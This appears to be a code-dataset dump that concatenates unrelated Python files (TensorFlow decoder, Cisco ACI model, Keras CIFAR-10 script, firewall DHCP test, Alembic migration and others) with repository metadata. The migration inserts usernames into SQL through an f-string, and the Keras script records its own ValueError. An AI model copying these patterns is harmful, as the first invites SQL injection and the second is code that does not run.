class ArchivedStoriesFeedResponseInterface(ApiResponseInterface):
items: [ArchivedStoriesFeedItem]
num_results: int
more_available: bool
max_id: int
class ArchivedStoriesFeedResponse(ApiResponse, ArchivedStoriesFeedResponseInterface):
pass
| [
"root@proscript.ru"
] | root@proscript.ru |
d5639c623837332fced341fd3abdf47957f070cd | b24ce5acced59ef367a20706949953f3ea81d57a | /tensorflow/contrib/seq2seq/python/ops/basic_decoder.py | d19e2b0d5e469b484a16e9290a1cb09684c16638 | [
"Apache-2.0"
] | permissive | BoldizsarZopcsak/Image-Classifier | b57dd3b72cf368cc1d66a5e318003a2a2d8338a4 | c0d471a55a70b3118178488db3c005a9277baade | refs/heads/master | 2022-11-19T12:28:49.625532 | 2018-01-20T15:48:48 | 2018-01-20T15:48:48 | 118,253,026 | 1 | 1 | Apache-2.0 | 2022-11-01T09:24:24 | 2018-01-20T15:04:57 | Python | UTF-8 | Python | false | false | 5,584 | py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A class of Decoders that may sample to generate the next input.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from tensorflow.contrib.rnn import core_rnn_cell
from tensorflow.contrib.seq2seq.python.ops import decoder
from tensorflow.contrib.seq2seq.python.ops import helper as helper_py
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.layers import base as layers_base
from tensorflow.python.util import nest
__all__ = [
"BasicDecoderOutput",
"BasicDecoder",
]
class BasicDecoderOutput(
collections.namedtuple("BasicDecoderOutput", ("rnn_output", "sample_id"))):
pass
class BasicDecoder(decoder.Decoder):
"""Basic sampling decoder."""
def __init__(self, cell, helper, initial_state, output_layer=None):
"""Initialize BasicDecoder.
Args:
cell: An `RNNCell` instance.
helper: A `Helper` instance.
initial_state: A (possibly nested tuple of...) tensors and TensorArrays.
output_layer: (Optional) An instance of `tf.layers.Layer`, i.e.,
`tf.layers.Dense`. Optional layer to apply to the RNN output prior
to storing the result or sampling.
Raises:
TypeError: if `cell` is not an instance of `RNNCell`, `helper`
is not an instance of `Helper`, or `output_layer` is not an instance
of `tf.layers.Layer`.
"""
if not isinstance(cell, core_rnn_cell.RNNCell):
raise TypeError("cell must be an RNNCell, received: %s" % type(cell))
if not isinstance(helper, helper_py.Helper):
raise TypeError("helper must be a Helper, received: %s" % type(helper))
if (output_layer is not None
and not isinstance(output_layer, layers_base._Layer)): # pylint: disable=protected-access
raise TypeError(
"output_layer must be a Layer, received: %s" % type(output_layer))
self._cell = cell
self._helper = helper
self._initial_state = initial_state
self._output_layer = output_layer
@property
def batch_size(self):
return self._helper.batch_size
def _rnn_output_size(self):
size = self._cell.output_size
if self._output_layer is None:
return size
else:
# To use layer's compute_output_shape, we need to convert the
# RNNCell's output_size entries into shapes with an unknown
# batch size. We then pass this through the layer's
# compute_output_shape and read off all but the first (batch)
# dimensions to get the output size of the rnn with the layer
# applied to the top.
output_shape_with_unknown_batch = nest.map_structure(
lambda s: tensor_shape.TensorShape([None]).concatenate(s),
size)
layer_output_shape = self._output_layer._compute_output_shape( # pylint: disable=protected-access
output_shape_with_unknown_batch)
return nest.map_structure(lambda s: s[1:], layer_output_shape)
@property
def output_size(self):
# Return the cell output and the id
return BasicDecoderOutput(
rnn_output=self._rnn_output_size(),
sample_id=tensor_shape.TensorShape([]))
@property
def output_dtype(self):
# Assume the dtype of the cell is the output_size structure
# containing the input_state's first component's dtype.
# Return that structure and int32 (the id)
dtype = nest.flatten(self._initial_state)[0].dtype
return BasicDecoderOutput(
nest.map_structure(lambda _: dtype, self._rnn_output_size()),
dtypes.int32)
def initialize(self, name=None):
"""Initialize the decoder.
Args:
name: Name scope for any created operations.
Returns:
`(finished, first_inputs, initial_state)`.
"""
return self._helper.initialize() + (self._initial_state,)
def step(self, time, inputs, state, name=None):
"""Perform a decoding step.
Args:
time: scalar `int32` tensor.
inputs: A (structure of) input tensors.
state: A (structure of) state tensors and TensorArrays.
name: Name scope for any created operations.
Returns:
`(outputs, next_state, next_inputs, finished)`.
"""
with ops.name_scope(name, "BasicDecoderStep", (time, inputs, state)):
cell_outputs, cell_state = self._cell(inputs, state)
if self._output_layer is not None:
cell_outputs = self._output_layer(cell_outputs)
sample_ids = self._helper.sample(
time=time, outputs=cell_outputs, state=cell_state)
(finished, next_inputs, next_state) = self._helper.next_inputs(
time=time,
outputs=cell_outputs,
state=cell_state,
sample_ids=sample_ids)
outputs = BasicDecoderOutput(cell_outputs, sample_ids)
return (outputs, next_state, next_inputs, finished)
| [
"zboldi@gmail.com"
] | zboldi@gmail.com |
c69bb2f790f1d53f574bc2e900a0ceffb5445294 | f7ee578df2ef14dca614ea2238520405a7bc1010 | /emission/tests/storageTests/TestMoveFilterField.py | c371fc9aefc1b17ab39a5500b2cbb2002ccf0933 | [
"BSD-3-Clause"
] | permissive | jeffdh5/e-mission-server | 5a02583d7a06b902fa4c1af7858df58c0bd65145 | c4e3ebdb77133a58b5e2796c8850b479ffa8a096 | refs/heads/master | 2020-12-11T07:38:18.620865 | 2015-12-31T01:05:37 | 2015-12-31T01:05:37 | 30,099,294 | 0 | 0 | null | 2015-01-31T02:14:15 | 2015-01-31T02:14:15 | null | UTF-8 | Python | false | false | 3,565 | py | # Standard imports
import unittest
import datetime as pydt
import logging
import json
# Our imports
import emission.core.get_database as edb
import emission.storage.timeseries.format_hacks.move_filter_field as estfm
# Test imports
import emission.tests.common as etc
class TestTimeSeries(unittest.TestCase):
def setUp(self):
etc.setupRealExample(self, "emission/tests/data/real_examples/iphone_2015-11-06")
def tearDown(self):
edb.get_timeseries_db().remove({"user_id": self.testUUID})
def testMoveFilters(self):
# First, check that all filters are in metadata
for entry in edb.get_timeseries_db().find({'user_id': self.testUUID,
'metadata.filter': 'distance',
"metadata.key": "background/location"}):
del entry["_id"]
entry["metadata"]["key"] = "background/filtered_location"
edb.get_timeseries_db().insert(entry)
self.assertEquals(edb.get_timeseries_db().find({'user_id': self.testUUID,
'metadata.filter': 'distance',
"metadata.key": "background/location"}).count(), 474)
self.assertEquals(edb.get_timeseries_db().find({'user_id': self.testUUID,
'metadata.filter': 'distance',
"metadata.key": "background/filtered_location"}).count(), 474)
self.assertEquals(edb.get_timeseries_db().find({'user_id': self.testUUID,
'metadata.filter': 'distance',
"metadata.key": "background/motion_activity"}).count(), 594)
self.assertEquals(edb.get_timeseries_db().find({'user_id': self.testUUID,
'metadata.filter': 'distance',
"metadata.key": "statemachine/transition"}).count(), 20)
# Now, move all filters
estfm.move_all_filters_to_data()
# Finally, check that no filters are in metadata
self.assertEquals(edb.get_timeseries_db().find({'user_id': self.testUUID,
'metadata.filter': 'distance',
"metadata.key": "background/location"}).count(), 0)
self.assertEquals(edb.get_timeseries_db().find({'user_id': self.testUUID,
'metadata.filter': 'distance',
"metadata.key": "background/filtered_location"}).count(), 0)
self.assertEquals(edb.get_timeseries_db().find({'user_id': self.testUUID,
'metadata.filter': 'distance',
"metadata.key": "background/motion_activity"}).count(), 0)
self.assertEquals(edb.get_timeseries_db().find({'user_id': self.testUUID,
'metadata.filter': 'distance',
"metadata.key": "statemachine/transition"}).count(), 0)
# And that location filters are in data
self.assertEquals(edb.get_timeseries_db().find({'user_id': self.testUUID,
'data.filter': 'distance',
"metadata.key": "background/location"}).count(), 474)
self.assertEquals(edb.get_timeseries_db().find({'user_id': self.testUUID,
'data.filter': 'distance',
"metadata.key": "background/filtered_location"}).count(), 474)
# But not in the others
self.assertEquals(edb.get_timeseries_db().find({'user_id': self.testUUID,
'data.filter': 'distance',
"metadata.key": "background/motion_activity"}).count(), 0)
self.assertEquals(edb.get_timeseries_db().find({'user_id': self.testUUID,
'data.filter': 'distance',
"metadata.key": "statemachine/transition"}).count(), 0)
if __name__ == '__main__':
logging.basicConfig(level=logging.DEBUG)
unittest.main()
| [
"shankari@eecs.berkeley.edu"
] | shankari@eecs.berkeley.edu |
01d2e4527f7d2563f3902393cf341ec5f00e4969 | f4b60f5e49baf60976987946c20a8ebca4880602 | /lib64/python2.7/site-packages/acimodel-1.3_2j-py2.7.egg/cobra/modelimpl/nws/rtoverridefwpol.py | 307c8d55e48a35eeb21395c77fc39efe8dff02b8 | [] | no_license | cqbomb/qytang_aci | 12e508d54d9f774b537c33563762e694783d6ba8 | a7fab9d6cda7fadcc995672e55c0ef7e7187696e | refs/heads/master | 2022-12-21T13:30:05.240231 | 2018-12-04T01:46:53 | 2018-12-04T01:46:53 | 159,911,666 | 0 | 0 | null | 2022-12-07T23:53:02 | 2018-12-01T05:17:50 | Python | UTF-8 | Python | false | false | 4,958 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2016 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class RtOverrideFwPol(Mo):
"""
Mo doc not defined in techpub!!!
"""
meta = TargetRelationMeta("cobra.model.nws.RtOverrideFwPol", "cobra.model.infra.AttPolicyGroup")
meta.moClassName = "nwsRtOverrideFwPol"
meta.rnFormat = "rtinfraOverrideFwPol-[%(tDn)s]"
meta.category = MoCategory.RELATIONSHIP_FROM_LOCAL
meta.label = "Access Attachable Policy Group"
meta.writeAccessMask = 0x2100000000001
meta.readAccessMask = 0x2300000000011
meta.isDomainable = False
meta.isReadOnly = True
meta.isConfigurable = False
meta.isDeletable = False
meta.isContextRoot = False
meta.parentClasses.add("cobra.model.nws.FwPol")
meta.superClasses.add("cobra.model.reln.From")
meta.superClasses.add("cobra.model.reln.Inst")
meta.superClasses.add("cobra.model.pol.NFromRef")
meta.rnPrefixes = [
('rtinfraOverrideFwPol-', True),
]
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "lcOwn", "lcOwn", 9, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "local"
prop._addConstant("implicit", "implicit", 4)
prop._addConstant("local", "local", 0)
prop._addConstant("policy", "policy", 1)
prop._addConstant("replica", "replica", 2)
prop._addConstant("resolveOnBehalf", "resolvedonbehalf", 3)
meta.props.add("lcOwn", prop)
prop = PropMeta("str", "modTs", "modTs", 7, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "never"
prop._addConstant("never", "never", 0)
meta.props.add("modTs", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
prop = PropMeta("str", "tCl", "tCl", 19097, PropCategory.REGULAR)
prop.label = "Target-class"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 4453
prop.defaultValueStr = "infraAttPolicyGroup"
prop._addConstant("infraAttPolicyGroup", None, 4453)
prop._addConstant("unspecified", "unspecified", 0)
meta.props.add("tCl", prop)
prop = PropMeta("str", "tDn", "tDn", 19096, PropCategory.REGULAR)
prop.label = "Target-dn"
prop.isConfig = True
prop.isAdmin = True
prop.isCreateOnly = True
prop.isNaming = True
meta.props.add("tDn", prop)
meta.namingProps.append(getattr(meta.props, "tDn"))
getattr(meta.props, "tDn").needDelimiter = True
# Deployment Meta
meta.deploymentQuery = True
meta.deploymentType = "Ancestor"
meta.deploymentQueryPaths.append(DeploymentPathMeta("nwsFwPolToPortGroups", "Portgroups", "cobra.model.vmm.EpPD"))
meta.deploymentQueryPaths.append(DeploymentPathMeta("nwsFwPolToVirtualMachines", "Virtual Machines", "cobra.model.comp.Vm"))
def __init__(self, parentMoOrDn, tDn, markDirty=True, **creationProps):
namingVals = [tDn]
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"collinsctk@qytang.com"
] | collinsctk@qytang.com |
2e9f0ae01fbad3c4bae02bb7427a5b127c6d02ff | eb3683f9127befb9ef96d8eb801206cf7b84d6a7 | /stypy/sgmc/sgmc_cache/taxonomy/builtin_functions/str/error_str_return_type.py | cffaa9f073b7b8d8146ea300f49c0b12c05ebde2 | [] | no_license | ComputationalReflection/stypy | 61ec27333a12f76ac055d13f8969d3e0de172f88 | be66ae846c82ac40ba7b48f9880d6e3990681a5b | refs/heads/master | 2021-05-13T18:24:29.005894 | 2018-06-14T15:42:50 | 2018-06-14T15:42:50 | 116,855,812 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,866 | py |
# -*- coding: utf-8 -*-
"""
ORIGINAL PROGRAM SOURCE CODE:
1: # coding=utf-8
2: __doc__ = "str builtin is invoked and its return type is used to call an non existing method"
3:
4: if __name__ == '__main__':
5: # Call options
6: # () -> <type 'str'>
7: # (AnyType) -> <type 'str'>
8:
9:
10: # Call the builtin
11: ret = str(3)
12:
13: # Type error
14: ret.unexisting_method()
15:
"""
# Import the stypy library necessary elements
from stypy.type_inference_programs.type_inference_programs_imports import *
# Create the module type store
module_type_store = Context(None, __file__)
# ################# Begin of the type inference program ##################
# Assigning a Str to a Name (line 2):
str_1 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 2, 10), 'str', 'str builtin is invoked and its return type is used to call an non existing method')
# Assigning a type to the variable '__doc__' (line 2)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 2, 0), '__doc__', str_1)
if (__name__ == '__main__'):
# Assigning a Call to a Name (line 11):
# Call to str(...): (line 11)
# Processing the call arguments (line 11)
int_3 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 11, 14), 'int')
# Processing the call keyword arguments (line 11)
kwargs_4 = {}
# Getting the type of 'str' (line 11)
str_2 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 11, 10), 'str', False)
# Calling str(args, kwargs) (line 11)
str_call_result_5 = invoke(stypy.reporting.localization.Localization(__file__, 11, 10), str_2, *[int_3], **kwargs_4)
# Assigning a type to the variable 'ret' (line 11)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 11, 4), 'ret', str_call_result_5)
# Call to unexisting_method(...): (line 14)
# Processing the call keyword arguments (line 14)
kwargs_8 = {}
# Getting the type of 'ret' (line 14)
ret_6 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 14, 4), 'ret', False)
# Obtaining the member 'unexisting_method' of a type (line 14)
unexisting_method_7 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 14, 4), ret_6, 'unexisting_method')
# Calling unexisting_method(args, kwargs) (line 14)
unexisting_method_call_result_9 = invoke(stypy.reporting.localization.Localization(__file__, 14, 4), unexisting_method_7, *[], **kwargs_8)
# ################# End of the type inference program ##################
module_errors = stypy.errors.type_error.StypyTypeError.get_error_msgs()
module_warnings = stypy.errors.type_warning.TypeWarning.get_warning_msgs()
| [
"redondojose@uniovi.es"
] | redondojose@uniovi.es |
d818f2b57247fda0d8236a1bd190811a8475a46a | 6f917fb1840ea950b21941995ea96c3ec17d0a18 | /Study/keras2/keras77_07_cifar10_InceptionV3.py | 06f20232131f71809ece548e20bab695e8a87d22 | [] | no_license | maiorem/Artificial-Intelligence | 504a1656921c6d206237f17cd053ae38e1b4705c | 367fbffb678bd1761105ae4f37f015f90120d3f0 | refs/heads/main | 2023-02-03T00:24:20.571707 | 2020-12-18T08:24:48 | 2020-12-18T08:24:48 | 311,254,233 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,068 | py | import numpy as np
from tensorflow.keras.applications import InceptionV3
from tensorflow.keras.layers import Dense, Flatten, Input, BatchNormalization, Dropout, Activation
from tensorflow.keras.models import Sequential, Model
from tensorflow.keras.datasets import cifar10
from tensorflow.keras.utils import to_categorical
from tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint, ReduceLROnPlateau
#1. 데이터
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
x_predict=x_test[:10, :, :, :]
x_train=x_train.astype('float32')/255.
x_test=x_test.astype('float32')/255.
x_predict=x_predict.astype('float32')/255.
y_train=to_categorical(y_train)
y_test=to_categorical(y_test)
# 2. 모델
inceptionv3=InceptionV3(weights='imagenet', include_top=False, input_shape=(32, 32, 3)) # 14,714,688
inceptionv3.trainable=False
model=Sequential()
model.add(inceptionv3)
model.add(Flatten())
model.add(Dense(256))
model.add(BatchNormalization())
model.add(Activation('relu'))
model.add(Dense(256))
model.add(Dense(10, activation='softmax'))
# 3. 컴파일, 훈련
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
es=EarlyStopping(monitor='val_loss', patience=10, mode='auto')
reduce_lr=ReduceLROnPlateau(monitor='val_loss', patience=3, factor=0.5, verbose=1)
modelpath='./model/inceptionv3-{epoch:02d}-{val_loss:.4f}.hdf5'
cp=ModelCheckpoint(filepath=modelpath, monitor='val_loss', save_best_only=True, mode='auto')
model.fit(x_train, y_train, epochs=1000, batch_size=32, verbose=1, validation_split=0.2, callbacks=[es, cp, reduce_lr])
#4. 평가, 예측
loss, accuracy=model.evaluate(x_test, y_test, batch_size=32)
print('loss : ', loss)
print('accuracy : ', accuracy)
y_predict=model.predict(x_predict)
y_predict=np.argmax(y_predict, axis=1) #One hot encoding의 decoding은 numpy의 argmax를 사용한다.
y_actually=np.argmax(y_test[:10, :], axis=1)
print('실제값 : ', y_actually)
print('예측값 : ', y_predict)
'''
ValueError: Input size must be at least 75x75; got `input_shape=(32, 32, 3)`
''' | [
"maiorem00@gmail.com"
] | maiorem00@gmail.com |
c9638982979fe9123e4137a7d6a755d188484b69 | e2e08d7c97398a42e6554f913ee27340226994d9 | /pyautoTest-master(ICF-7.5.0)/test_case/scg/scg_DCHP_Server/test_c139270.py | 09792a397e1f38790b7d1ba0d50c6c908e764c4c | [] | no_license | lizhuoya1111/Automated_testing_practice | 88e7be512e831d279324ad710946232377fb4c01 | b3a532d33ddeb8d01fff315bcd59b451befdef23 | refs/heads/master | 2022-12-04T08:19:29.806445 | 2020-08-14T03:51:20 | 2020-08-14T03:51:20 | 287,426,498 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,516 | py | import pytest
import time
import sys
from os.path import dirname, abspath
sys.path.insert(0, dirname(dirname(abspath(__file__))))
from page_obj.scg.scg_def_physical_interface import *
from page_obj.scg.scg_def_vlan_interface import *
from page_obj.scg.scg_def_bridge import *
from page_obj.common.rail import *
from page_obj.scg.scg_def_physical_interface import *
from page_obj.common.ssh import *
from page_obj.scg.scg_def_dhcp import *
from page_obj.scg.scg_dev import *
from page_obj.scg.scg_def_ifname_OEM import *
from page_obj.scg.scg_def import *
test_id = 139270
def test_c139270(browser):
try:
login_web(browser, url=dev1)
a = Shell_SSH()
a.connect(dev1)
a.execute("en")
a.execute("conf t")
a.execute("interface gigabitethernet "+interface_name_3)
a.execute("ip address 131.1.1.1 255.255.255.0")
a.execute("exit")
dhcp_server_add(browser, interface=interface_name_3,
dhcp_type="dhcp_server", dhcp_gw="131.1.1.254", dhcp_sm="24",
dns_server1="114.114.114.114", wins_server1="115.115.115.115",
ip_range1_1="131.1.1.5", ip_range1_2="131.1.1.20")
time.sleep(1)
loginfo1 = get_log_info(browser, 管理日志)
# print(loginfo1)
dhcp_server_edit_or_delete(browser, fuction="edit", dhcp_type="server",
ip_range1_1="131.1.1.6", ip_range1_2="131.1.1.15")
time.sleep(1)
loginfo2 = get_log_info(browser, 管理日志)
browser.switch_to.default_content()
# print(loginfo2)
time.sleep(1)
dhcp_server_edit_or_delete(browser, fuction="delete")
loginfo3 = get_log_info(browser, 管理日志)
# print(loginfo3)
time.sleep(1)
a = Shell_SSH()
a.connect(dev1)
a.execute("en")
a.execute("conf t")
a.execute("interface gigabitethernet "+interface_name_3)
a.execute("no ip address 131.1.1.1")
a.execute("exit")
try:
assert "启动DHCP成功" in loginfo1
assert "设置DHCP成功" in loginfo2
assert "删除DHCP成功" in loginfo3
rail_pass(test_run_id, test_id)
except:
rail_fail(test_run_id, test_id)
assert "启动DHCP成功" in loginfo1
assert "设置DHCP成功" in loginfo2
assert "删除DHCP成功" in loginfo3
except Exception as err:
# 如果上面的步骤有报错,重新设备,恢复配置
print(err)
rail_fail(test_run_id, test_id)
reload(hostip=dev1)
assert False
if __name__ == '__main__':
pytest.main(["-v", "-s", "test_c" + str(test_id) + ".py"])
| [
"15501866985@163.com"
] | 15501866985@163.com |
9d6bbb76470fb5d0e262f7b536a47205de61ce1e | e1abd868bfad11bf93c50eee1dc9976674de2358 | /setup.py | af6a5de4baca477cae84d74eba1926d6aac1f4f6 | [] | no_license | markmuetz/scaffold_analysis | 5c7e9d04b24abe3462c8946381f4cab264bf09e0 | c02d32536c801b23ac8a71e36d25fa922e7cfd94 | refs/heads/master | 2022-06-03T16:13:54.775718 | 2022-05-31T13:22:24 | 2022-05-31T13:22:24 | 92,677,664 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,463 | py | #!/usr/bin/env python
import os
try:
from setuptools import setup, Extension
except ImportError:
from distutils.core import setup, Extension
from scaffold.version import get_version
def read(fname):
try:
return open(os.path.join(os.path.dirname(__file__), fname)).read()
except:
return ''
setup(
name='scaffold',
version=get_version(),
description='High-resolution analysis',
long_description=read('readme.rst'),
author='Mark Muetzelfeldt',
author_email='m.muetzelfeldt@pgr.reading.ac.uk',
maintainer='Mark Muetzelfeldt',
maintainer_email='m.muetzelfeldt@pgr.reading.ac.uk',
packages=[
'scaffold',
'scaffold.cycle',
'scaffold.expt',
'scaffold.suite',
'scaffold.tests'
],
scripts=[ ],
python_requires='>=3.6',
install_requires=[
'omnium>=0.10.2',
'cloud_tracking',
'f90nml',
# 'iris',
'matplotlib',
'numpy',
'scipy',
],
package_data={ },
url='https://github.com/markmuetz/scaffold_analysis',
classifiers=[
'Environment :: Console',
'Intended Audience :: Science/Research',
'Natural Language :: English',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python :: 3.6',
'Programming Language :: C',
'Topic :: Scientific/Engineering :: Atmospheric Science',
],
keywords=[''],
)
| [
"markmuetz@gmail.com"
] | markmuetz@gmail.com |
c631ce14fa9545f28ff4141ddc75270876ae683c | da459298c4bdbb745f4ed80ce1c9da15dd8fbb34 | /demisto_sdk/commands/format/update_genericmodule.py | 6dae063b2baf56525d321cab77a0cde0727d3fff | [
"MIT"
] | permissive | demisto/demisto-sdk | af998a87523d03097f725ed8f31f6a44f4605ef2 | 3169757a2f98c8457e46572bf656ec6b69cc3a2e | refs/heads/master | 2023-08-22T03:44:31.654275 | 2023-08-21T14:45:22 | 2023-08-21T14:45:22 | 219,291,269 | 63 | 75 | MIT | 2023-09-14T14:41:12 | 2019-11-03T11:36:13 | Python | UTF-8 | Python | false | false | 2,162 | py | from typing import Tuple
from demisto_sdk.commands.common.constants import (
FILETYPE_TO_DEFAULT_FROMVERSION,
FileType,
)
from demisto_sdk.commands.common.logger import logger
from demisto_sdk.commands.format.format_constants import (
ERROR_RETURN_CODE,
SKIP_RETURN_CODE,
SUCCESS_RETURN_CODE,
)
from demisto_sdk.commands.format.update_generic_json import BaseUpdateJSON
class GenericModuleJSONFormat(BaseUpdateJSON):
"""GenericModuleJSONFormat class is designed to update generic module JSON file according to Demisto's convention.
Attributes:
input (str): the path to the file we are updating at the moment.
output (str): the desired file name to save the updated version of the JSON to.
"""
def __init__(
self,
input: str = "",
output: str = "",
path: str = "",
from_version: str = "",
no_validate: bool = False,
**kwargs,
):
super().__init__(
input=input,
output=output,
path=path,
from_version=from_version,
no_validate=no_validate,
**kwargs,
)
def run_format(self) -> int:
try:
logger.info(
f"\n[blue]================= Updating file {self.source_file} =================[/blue]"
)
super().update_json(
default_from_version=FILETYPE_TO_DEFAULT_FROMVERSION.get(
FileType.GENERIC_MODULE
)
)
self.set_default_values_as_needed()
self.save_json_to_destination_file()
return SUCCESS_RETURN_CODE
except Exception as err:
logger.debug(
f"\n[red]Failed to update file {self.source_file}. Error: {err}[/red]"
)
return ERROR_RETURN_CODE
def format_file(self) -> Tuple[int, int]:
"""Manager function for the generic module JSON updater."""
format_res = self.run_format()
if format_res:
return format_res, SKIP_RETURN_CODE
else:
return format_res, self.initiate_file_validator()
| [
"noreply@github.com"
] | demisto.noreply@github.com |
70b47bc20fa0747f8ebdcddca39cee6d773a59b7 | b9b967c8154ffb3c3622c4b46065132a33e785f6 | /server/migrations/versions/25bdca95116e_backfill_usernames_history.py | 9d47ccf0e197217c90187c58165fcf84ba31396d | [
"Apache-2.0"
] | permissive | SURFscz/SBS | 5917561656caec042e5a6c966aeb54b82e96f51d | b159eeb7a5b8246aebd9849b4b3b61b9af1a8514 | refs/heads/main | 2023-08-31T12:42:52.473898 | 2023-08-31T11:58:51 | 2023-08-31T11:58:51 | 162,148,147 | 4 | 1 | Apache-2.0 | 2023-09-12T12:07:41 | 2018-12-17T15:05:54 | JavaScript | UTF-8 | Python | false | false | 736 | py | """Backfill usernames history
Revision ID: 25bdca95116e
Revises: 3cda08121a2f
Create Date: 2021-04-07 08:04:36.467191
"""
from alembic import op
from sqlalchemy import text
# revision identifiers, used by Alembic.
revision = '25bdca95116e'
down_revision = '3cda08121a2f'
branch_labels = None
depends_on = None
def upgrade():
conn = op.get_bind()
conn.execute(text("ALTER TABLE user_names_history ADD UNIQUE INDEX user_names_history_username(username)"))
result = conn.execute(text("SELECT username FROM `users` WHERE `username` IS NOT NULL"))
for row in result:
username = row[0]
conn.execute(text(f"INSERT INTO `user_names_history` (`username`) VALUES ('{username}')"))
def downgrade():
pass
| [
"oharsta@zilverline.com"
] | oharsta@zilverline.com |
528a8ce895effa2425984fb1b4778eb503f97668 | 66c7b0da6ee27ddce0943945503cdecf199f77a2 | /rllib/dataset/transforms/clipper.py | ae5dc975babb030a2182a4fe53278f08e935ae14 | [
"MIT"
] | permissive | tzahishimkin/extended-hucrl | 07609f9e9f9436121bcc64ff3190c966183a2cd9 | c144aeecba5f35ccfb4ec943d29d7092c0fa20e3 | refs/heads/master | 2023-07-09T22:57:28.682494 | 2021-08-24T08:50:16 | 2021-08-24T08:50:16 | 383,819,908 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,708 | py | """Implementation of a Transformation that clips attributes."""
import numpy as np
import torch
import torch.jit
import torch.nn as nn
from .abstract_transform import AbstractTransform
class Clipper(nn.Module):
"""Clipper Class."""
def __init__(self, min_val, max_val):
super().__init__()
self._min = min_val
self._max = max_val
def forward(self, array):
"""See `AbstractTransform.__call__'."""
if isinstance(array, torch.Tensor):
return torch.clamp(array, self._min, self._max)
else:
return np.clip(array, self._min, self._max)
@torch.jit.export
def inverse(self, array):
"""See `AbstractTransform.inverse'."""
return array
class RewardClipper(AbstractTransform):
"""Implementation of a Reward Clipper.
Given a reward, it will clip it between min_reward and max_reward.
Parameters
----------
min_reward: float, optional (default=0.)
minimum bound for rewards.
max_reward: float, optional (default=1.)
maximum bound for rewards.
Notes
-----
This transformation does not have a inverse so the same observation is returned.
"""
def __init__(self, min_reward=0.0, max_reward=1.0):
super().__init__()
self._clipper = Clipper(min_reward, max_reward)
def forward(self, observation):
"""See `AbstractTransform.__call__'."""
observation.reward = self._clipper(observation.reward)
return observation
@torch.jit.export
def inverse(self, observation):
"""See `AbstractTransform.inverse'."""
observation.reward = self._clipper.inverse(observation.reward)
return observation
class ActionClipper(AbstractTransform):
"""Implementation of a Action Clipper.
Given an action, it will clip it between min_action and max_action.
Parameters
----------
min_action: float, optional (default=0.)
minimum bound for rewards.
max_action: float, optional (default=1.)
maximum bound for rewards.
Notes
-----
This transformation does not have a inverse so the same observation is returned.
"""
def __init__(self, min_action=-1.0, max_action=1.0):
super().__init__()
self._clipper = Clipper(min_action, max_action)
def forward(self, observation):
"""See `AbstractTransform.__call__'."""
observation.action = self._clipper(observation.action)
return observation
@torch.jit.export
def inverse(self, observation):
"""See `AbstractTransform.inverse'."""
observation.action = self._clipper.inverse(observation.action)
return observation
| [
"shi.tzahi@gmail.com"
] | shi.tzahi@gmail.com |
25ba0535997991ef82b8d6d879ed5f81d8b47140 | 88ae8695987ada722184307301e221e1ba3cc2fa | /tools/metrics/histograms/merge_xml_test.py | 3dab9df3b524089bca4f33a13110782a250d6cbe | [
"BSD-3-Clause"
